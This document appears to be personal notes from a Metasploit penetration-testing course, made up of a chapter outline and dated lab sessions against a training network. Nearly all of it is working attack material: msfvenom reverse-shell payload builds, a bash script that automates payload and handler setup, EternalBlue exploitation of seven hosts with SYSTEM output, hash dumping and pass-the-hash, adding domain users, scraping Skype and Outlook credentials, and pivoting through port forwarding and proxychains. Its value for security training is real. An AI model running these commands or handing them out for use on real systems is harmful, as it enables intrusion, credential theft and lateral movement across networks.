Chapter 3 – Introduction to Metasploit

1. Picking an Exploit
2. Setting Exploit Options
3. Picking a Payload
4. Setting Payload Options
5. Running the Exploit
6. Connecting to the Remote System
7. Performing Post Exploitation Processes

msf > show exploits
msf > help search
msf > search ms17-010
msf > search cve:2013-3660
msf > search unreal
msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
msf > use
msf > set

To start the Database at a terminal prompt, type the following:
● service postgresql start
● service metasploit start
● msfconsole

LHOST = Local Host, or our Kali System
RHOST = Remote Host, or our target System
LPORT = Port we want to use on our Kali System
RPORT = Port we want to attack on our target System

> use exploit/unix/irc/unreal_ircd_3281_backdoor
> show options
> set rhost 192.168.15.214
> exploit

##Multiple Target Types
> show targets
> use exploit/windows/smb/ms08_067_netapi
> show options
> show targets
> set target 2
> show options
> show advanced

##Picking a Payload
> show payloads
> set payload
examples:
set payload osx/x86/shell_reverse_tcp
set payload linux/x64/shell_reverse_tcp
set payload windows/shell_reverse_tcp
*set payload windows/meterpreter/reverse_tcp
reverse_tcp ##one of the ways the payloads communicate back to the attacking system

##Setting Payload Options
> show options
> set payload windows/meterpreter/reverse_tcp

##Running the Exploit
> show options
> set lhost 192.168.15.236 (kali)
> set rhost 192.168.15.243 (win)
> exploit

##Connecting to a Remote Session
> sessions ## To check what sessions were created
> sessions -i nr
meterpreter> ##prompt when we connect to the session
meterpreter> shell ##we can see that we do indeed have a remote shell to the Windows system.

Chapter 4 – Meterpreter Shell
- Word via an SMB script: can it be loaded into that doc? What kind of malware is it?
- pivoting | tunneling
- autoroute
- reverse vs bind

#############################################################################
28.05.2018

Rapid7 = Metasploit, written in Ruby
development / usage
exploit, vulnerability, threat, payload (the antivirus detects it)
vsftpd 2.3.4 (vulnerable)

metasploit:
msfconsole (preferred)
msfvenom
msfpayload (merged into msfvenom)
msfencode (merged into msfvenom)
msfgui - deprecated
msfweb - deprecated
armitage - GUI for Metasploit

modules: exploits, auxiliary, post, payload, encoders, nops

msfvenom
-p --payload windows #OS platform
   /meterpreter #platform, type of payload
   reverse_tcp #form of communication
LHOST= #our IP, which the malware will communicate with
LPORT= #our port, where we wait for the communication
-f --Output format, exe or elf
-o --out Save the payload, e.g. foto.exe

use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost <local ip>
set lport <local port>
exploit
shell
dir :)

#############################################################################
###04.2018
RC scripts

#!/bin/bash
echo -n
read
chmod +x dardan
./dardan

example:
msfvenom -p windows/meterpreter/reverse_tcp -f >shell.exe
==================================================
nano script.rc --create
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/reverse_tcp
set RHOST 172.16.60.88
exploit
sessions -i 1
msfconsole -r script.rc --to execute
==================================================
nano auto.sh -- to create the file
chmod +x auto.sh -- to make executable
./auto.sh -- to execute
--------------------------------
#!/bin/bash
# prompt for the msfvenom parameters, then build the payload file
echo -n "Payload: "
read payload
echo -n "LHOST: "
read lhost
echo -n "LPORT: "
read lport
echo -n "Format: "
read format
echo -n "Name: "
read emri
msfvenom -p "$payload" LHOST="$lhost" LPORT="$lport" -f "$format" -o "$emri.$format"
==================================================
-- same script, extended to write script.rc and start the handler
#!/bin/bash
echo -n "Payload: "
read payload
echo -n "LHOST: "
read lhost
echo -n "LPORT: "
read lport
echo -n "Format: "
read format
echo -n "Name: "
read emri
msfvenom -p "$payload" LHOST="$lhost" LPORT="$lport" -f "$format" -o "$emri.$format"
# generate the resource script for the matching handler
echo "use exploit/multi/handler" > script.rc
echo "set payload $payload" >> script.rc
echo "set lhost $lhost" >> script.rc
echo "set lport $lport" >> script.rc
echo "exploit -j" >> script.rc
msfconsole -r script.rc
./auto.sh --to execute
==================================================
#############################################################################
*11.06.2018*
kali - 172.16.60.78

*After we gain access.*
Vector of Attack
1. Viber: check which app is being used (e.g. Viber) and explore whether it contains important data
2. Outlook: mail files can be taken from the hacked machine; Outlook stores the password in plaintext
3. Skype: gives the password hashed, gives the chat text in clear text

*How do we get access inside?*

##Target network
172.16.0.0/20

##Enumeration
SCAN:
nmap 172.16.0.0/24 --make a default scan
nmap -Pn 172.16.0.0/20 --Pn ping less
nmap -O 172.16.0.0/20

##Targeted service
445 SMB (open services, service versions e.g. ftp, 3389)

##Confirm vulnerable hosts
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 172.16.0.0/26
set threads 10
run

##VULNERABLE HOSTS
+ 172.16.0.3:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Standard 7600)
+ 172.16.0.12:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
+ 172.16.0.16:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
+ 172.16.0.17:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
+ 172.16.0.18:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
+ 172.16.0.19:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)
+ 172.16.0.20:445 - Host is likely VULNERABLE to MS17-010! (Windows 8.1 Pro 9600)

##EXPLOITATION
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 172.16.0.3
exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

set RHOST 172.16.0.12
exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

set RHOST 172.16.0.16
exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

set RHOST 172.16.0.17
exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

set RHOST 172.16.0.18
exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

set RHOST 172.16.0.19
exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

set RHOST 172.16.0.20
exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

##POST EXPLOITATION
use post/windows/gather/enum_domain --finds the domain server
set session 1
run (Cyberlab)

use post/windows/gather/smart_hashdump --extracts and presents SAM/SYSTEM
set session 1
run

use auxiliary/scanner/smb/smb_login
set smbuser John
set smbdomain Cyberlab
set smbpass (the hash value = John:1000:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1:::)
set rhosts 172.16.0.0/26
set threads 10
set verbose false
run
([+] 172.16.0.12:445 - 172.16.0.12:445 - Success: '.\John:aad3b435b51404eeaad3b435b51404ee:fef77dfdc7e5cdd9b28593b2d58f49e1' Administrator)

use exploit/windows/smb/ms17_010_eternalblue --on target 172.16.0.18, verify then exploit
set processname lsass.exe
exploit
=-WIN-=
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
sysinfo --PC info

use post/windows/gather/enum_applications
set rhost 172.16.0.3
run

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 172.16.0.12
set smbuser
set smbdomain
set smbpass
exploit

run post/multi/gather/skype_enum
run
cat /home/.... --the Skype chat shows the user and password of an email

rdesktop 172.16.0.13 -u Larry -p ESGL -d CyberLab

use exploit/windows/smb/psexec
set smbdomain Cyberlab
set PAYLOAD windows/x64/meterpreter/bind_tcp
set rhost 172.16.0.12
exploit
getuid
shell
net user --shows the users
net user John --shows this user's info
net user John /domain --domain info
net user user1 password /add /domain --if denied:
net user user1 password /add --add locally
net group "Domain Admins" /domain --shows which users are members
sessions
sessions -i
background
-------------------------------------
run post/windows/gather
run post/windows/gather/credentials
run post/windows/gather/forensics
/vnc
/windows_autologon
/enum_domain
/enum_hostfile
/enum_chrome
/enum_ie
/enum_logged_on_users
/enum_ms_product_keys
/enum_putty_saved_sessions
/screen_spy
/usb_history
/screen_unlock
run post/multi/gather/
run post/multi/manage
skype_enum
#############################################################################
18.06.2018
Vectors: Link, Email, Social Engineering ... Adobe Flash vulnerabilities, load option in meterpreter????, query on the DC, impersonation, add a user as Domain Admins member, hack the DC.
Techniques:
socks4 (auxiliary)
proxychains (tool, /etc/share/socks4)
portfwd (port forwarding: on the hacked machine, forward a port to a localhost IP -> on the hacker machine)
tool: autoroute (POST tool)

Stage1 - autoroute
nmap -sn 172.16.0.0/24 (ping scan)
nano 172.16.0.0.exe (save the scan result)
nmap -sS -sV 172.16.0.16 --finds the open ports, banner grabbing (save the results in a file)
nmap -p445 --script smb-vuln-ms17-010 172.16.0.16 (shows SMB vuln. info)
https://exploit-db.com (to get info about an exploit)
msfconsole
msf> search ms17_010
use exp/win/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.16.0.16
exploit
.> getuid
.> shell
net user /domain
net user nt-authority pass /add /domain
net group "domain admin" /domain
.> ping 172.16.16.16 (no ping; from shell> there is ping)
.> run post/multi/manage/autoroute
.> background
.> route
.> use aux/scan/portscan/tcp
set rports 445
set rhost 172.16.16.16
run (now it also sees the IP of the other interface)
set rhosts 172.16.16.0-50 (range scan for 445)
set threads 10
run
sessions -i 1
arp -a (to see who it has communicated with, i.e. the cache)
meterpreter> run arp_scanner -r 172.16.16.0/24
.> background
set rhost 172.16.16.23
.> set ports 22 (confirms open ports)
run
.> sessions
.> set rports 1-1000
run
from the hacker machine there is no ping
meterpreter> portfwd add -l 21 -p 21 -r 172.16.16.23
from the hacker machine: ftp 172.16.16.23
meterpreter> run
from the hacker machine: ftp 172.16.16.23 (now it shows as open)
meterpreter> portfwd flush
.> use aux/scanner/ftp/ftp_login
.> set rhosts 172.16.16.23
.> run (shows the version and other info about the service)
.> use aux/scanner/ftp/anonymous
.> set rhosts 172.16.16.23
.> exploit
.> use aux/scanner/ftp/ftp_login
.> set rhosts 172.16.16.23
set password anonymous
run
.> sessions
meterpreter> portfwd -l 2221 -p 21 -r 172.16.16.23
from the hacker machine: ftp 172.16.16.23
nc 172.16.16.23 2221
meterpreter> portfwd flush
.> background
.> use aux/server/socks4a
.> run
from the hacker machine:
nano /etc/proxychains.conf
add: socks4 127.0.0.1 1080
nmap 172.16.16.23 -p 21 (0 hosts up)
proxychains nmap 172.16.16.23 -p 21
proxychains ftp 172.16.16.23 (the ftp> login appears)
from the hacker machine:
proxychains firefox http://172.16.16.24
proxychains telnet 172.16.16.24 22
------------------------------------------------
use aux/server/browser_autopwn2
.> set exitonsession
.> show advanced
meterpreter> use post/win/gather/enum_domain
.> set AutoRunScript post/win/gather/enum_domain (the obtained session automatically runs another module)
#############################################################################
nmap 60.52 -p- (all running ports)
-sS -sV -p51 60.52 (banner grabbing)
nc 172.16.60.52 51
nano txt (save the value in the file)
base64 or base32 -d txt (decodes it)
############################################################################
############################################################################